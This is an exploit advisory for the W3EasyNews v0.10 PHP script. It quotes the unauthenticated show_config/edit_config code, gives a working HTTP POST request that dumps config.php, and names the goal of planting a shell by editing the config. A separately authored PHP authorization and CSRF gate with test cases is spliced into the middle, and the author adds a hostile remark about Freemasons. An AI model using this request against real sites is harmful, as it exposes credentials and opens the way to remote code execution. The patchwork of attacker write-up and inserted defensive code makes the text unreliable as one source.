
W3EasyNews v0.10 Show config file and Edit

Author: Asmar , Published: 08-06-2012
# --------------------------------------- #
Author : L3b-r1'z
Title : W3EasyNews v0.10 Show file and Edit
Date\Time : 8/6/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : N\A
Version : 0.10
# --------------------------------------- #
This PoC was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :
In the file Index.php, first the code:

// DATA
$action = $_SERVER['PHP_SELF'];
// post
$reset = $_POST['reset'];
$form_sent = $_POST['form_sent'];
$todo = $_POST['todo'];
$todo_hist = $_POST['todo_hist'];
$text = stripslashes($_POST['text']);

All of these variables are taken straight from the POST request :D

See lines 100 to 120:

if ($todo == "show_config"){
    if (file_exists($config) && is_file($config)){
        $file = $config;
        $text = read_file ($file);
        $todo_hist = "show_config";
        $result = "<p class='result_dis'>display: config</p>";
    }
    else {$result = "<p class='result_no'>config file not found</p>";}
}
// $todo - edit config
if ($todo == "edit_config"){
    if (file_exists($config) && is_file($config)){
        if ($todo_hist == "show_config"){
            $file = $config;
            write_text_to_file ($file, $text);
            $result = "<p class='result_ok'>config edited</p>".$res_dis;
        }
        else {$result = "<p class='result_no'>wrong file: cannot edit config</p>".$res_dis;}
    }
    else {$result = "<p class='result_no'>config file not found</p>";}
}

The Config Variable : $config = "config.php"; // config file

So the owner added Show Config and Edit Config actions :D

He wants to edit the site's config from here :D , but the owner did not think that hackers also want to edit the config ( FORM UPLOAD ) to upload a shell :P
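
A gate that the two branches above could sit behind, as an added example (not code from W3EasyNews or from the advisory's author). It assumes a session-based admin login that sets `$_SESSION['is_admin']` and a per-session CSRF token in `$_SESSION['csrf']`; those keys, the `csrf` form field and the function `config_action_allowed()` are hypothetical names.

```php
<?php
// Added example: authorization gate for the show_config / edit_config actions.
// Assumptions (not from W3EasyNews): the admin login sets $session['is_admin']
// and a per-session CSRF token lives in $session['csrf'].

const CONFIG_ACTIONS = ['show_config', 'edit_config'];

/**
 * Return true only if this request may read or write the config file.
 * Session and POST data are passed in so the check can be tested in isolation.
 */
function config_action_allowed(array $session, array $post, string $method): bool
{
    $todo = $post['todo'] ?? '';
    if (!is_string($todo) || !in_array($todo, CONFIG_ACTIONS, true)) {
        return false;                 // not a config action at all
    }
    if ($method !== 'POST') {
        return false;                 // state-changing actions only via POST
    }
    if (empty($session['is_admin'])) {
        return false;                 // caller is not a logged-in admin
    }
    $sent = $post['csrf'] ?? '';
    $want = $session['csrf'] ?? '';
    // Both tokens must be non-empty strings; hash_equals() compares in constant time.
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

// Constructed sample input: the POST body from the PoC, then an admin's request.
$poc_post      = ['text' => '', 'todo' => 'show_config',
                  'todo_hist' => 'show_config', 'form_sent' => 'yes'];
$admin_session = ['is_admin' => true, 'csrf' => 'constructed-token-123'];
$admin_post    = $poc_post + ['csrf' => 'constructed-token-123'];

$cases = [
    'PoC request, no session'      => [[], $poc_post],
    'admin session, token missing' => [$admin_session, $poc_post],
    'admin session, valid token'   => [$admin_session, $admin_post],
];
foreach ($cases as $label => [$session, $post]) {
    $ok = config_action_allowed($session, $post, 'POST');
    echo $label, ': ', $ok ? 'allowed' : 'denied', PHP_EOL;
}
```

Even behind this gate, `edit_config` writes request text into `config.php`, so whoever passes the check can still place PHP code in that file.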
# --------------------------------------- #
2) PoC :

From Live HTTP Headers:

Screenshot of how to use it : http://www11.0zz0.com/2012/06/08/04/571127533.png

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/w3easyNews/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 3730

text=&todo=show_config&todo_hist=show_config&form_sent=yes

And a screenshot of how the config is shown : http://www11.0zz0.com/2012/06/08/04/775136575.png

NOTE : Fuck All FREEMASONES
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID.
# --------------------------------------- #
